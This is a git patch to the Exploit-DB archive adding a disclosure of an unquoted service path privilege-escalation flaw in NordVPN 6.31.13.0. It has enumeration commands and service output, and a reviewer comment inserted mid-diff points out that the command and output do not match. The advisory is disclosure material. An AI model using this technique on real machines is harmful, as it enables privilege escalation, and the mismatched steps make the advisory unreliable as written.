From e286aad002bbd7f68555b44d6ddaecfbfc05315e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 5 Sep 2020 05:02:01 +0000
Subject: [PATCH] DB: 2020-09-05 1 changes to exploits/shellcodes Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
---
 exploits/windows/local/48790.txt | 34 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 35 insertions(+)
 create mode 100644 exploits/windows/local/48790.txt
diff --git a/exploits/windows/local/48790.txt b/exploits/windows/local/48790.txt
new file mode 100644
index 000000000..48965d769
--- /dev/null
+++ b/exploits/windows/local/48790.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
+# Discovery Date: 2020-09-03
+# Discovery by: chipo
+# Vendor Homepage: https://nordvpn.com
+# Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
+# Tested Version: 6.31.13.0
+# Tested on OS: Windows 10 Pro x64 es
+# Vulnerability Type: Unquoted Service Path
+
+# Find the discover Unquoted Service Path Vulnerability:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
+
+nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe
+
+# Service info:
+
+C:\>sc qc servicio
+[SC] QueryServiceConfig SUCCESS
+
+NOMBRE_SERVICIO: nordvpn-service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : nordvpn-service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d9bd9c924..4180d01e6 100644
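Review bot: The discovery command and the output shown under it in the new 48790.txt do not agree: the pipeline filters on `findstr /i "ovpnconnect"`, which cannot produce the `nordvpn-service` line printed beneath it, and `sc qc servicio` queries a placeholder name rather than the service; changing them to `findstr /i "nordvpn"` and `sc qc nordvpn-service` would make the steps reproducible. The advisory also omits the precondition that decides the risk rating: an unquoted path is only abusable when a low-privileged account can create a file in `C:\` or `C:\Program Files\`, which default Windows ACLs do not grant, so severity depends on the installation's folder permissions and this should be stated next to the `#Exploit:` paragraph. A remediation line is missing as well; suggest adding `# Fix: quote the service's ImagePath ("C:\Program Files\NordVPN\nordvpn-service.exe")` after the `NOMBRE_INICIO_SERVICIO` block. Note that the Discovery Date here (2020-09-03) differs from the date recorded in the files_exploits.csv entry (2020-09-04).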
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10373,6 +10373,7 @@ id,file,description,date,author,type,platform,port
 42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows,
 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
+48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,